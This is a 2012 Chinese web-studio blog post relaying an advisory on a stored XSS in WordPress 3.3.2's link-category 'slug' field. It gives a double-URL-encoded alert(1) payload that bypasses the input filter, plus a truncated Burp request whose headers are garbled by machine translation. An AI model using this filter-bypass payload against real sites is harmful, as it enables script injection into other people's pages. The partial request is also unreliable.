发表日期:2012-06-09 文章作者:爱永设计 浏览次数:15721 次
wordpress版本3.3.2经常遭受到XSS(跨站脚本攻击)的漏洞攻击。然而,该攻击性不是非常严重。详情如下:
a)登录管理员账号
b) 进入Links -> Links Categories菜单
c) 填写必要详情信息,拦截BURP suite请求。
d) 注入参数为slug。如果您在参数“slug”中注入<script>alert(1)</script> 值, 应用程序就会去除该攻击,数值变成alert1。如果有效负荷是双重编码,<script>alert(1)</script> 转化为%253cscript%253ealert%25281%2529%253c%252fscript%253e 旁路xss
保护。以下请求将显示raw burp请求、易受攻击参数和粗体标记的有效负荷。
BURP请求
POST /wordpress/wp-admin/edit-tags.php HTTP/1.1
Host: localhost 主机:本地主机
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: 接受text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive 代理连接:
Referer: 引用站点
标签:wordpress专栏日期:2024-03-24 浏览次数:43764 次
日期:2020-03-06 浏览次数:246638 次
日期:2018-07-07 浏览次数:318514 次
日期:2017-08-20 浏览次数:318876 次
日期:2016-09-09 浏览次数:319228 次
开发日期:2021-06-21 浏览次数:643926 次
开发日期:2021-04-21 浏览次数:702576 次
开发日期:2020-05-03 浏览次数:760069 次
开发日期:2019-12-02 浏览次数:739280 次
开发日期:2019-10-02 浏览次数:997242 次
日期:2014-03-22 浏览次数:22614 次
日期:2013-07-19 浏览次数:30366 次
日期:2012-12-15 浏览次数:27751 次
日期:2012-09-30 浏览次数:16797 次
日期:2012-07-13 浏览次数:15591 次
致力于互联网品牌建设与网络营销,专业领域包括网站建设、网站模板、移动互联网营销、wordpress平台开发等,服务范围涵盖基础的域名服务、主机 服务;企业邮箱、云服务器、网络营销等应用服务,为不同类型的客户提供良好的互联网应用定制解决方案,帮助客户在新的全球化互联网环境中保持优势。
爱永设计工作室一直致力于品牌精美的网页设计、网页制作DIV+CSS布局、JS效果、精美网站模板、标志设计、专业仿站, 低廉的价格,真诚的服务,我们拥有全国各地的客户群体和各行业的成功案例。以一流的服务,出色的网页设计和制作能力,认真严谨的工作态度为客户提供优质满意的服务。期待与您的合作!
Copyright © 2012 - 2024 aysheji.com All Rights Reserved 爱永设计 版权所有
邮箱:aysheji@163.com 在线客服:276583799 模板演示地址:www.aymoban.com 备案号:京ICP备13060102号-3
服务内容: 网页设计 网站建设 网站制作 网站模板 婚庆网站模板 摄影网站 手机网站制作 自适应网站制作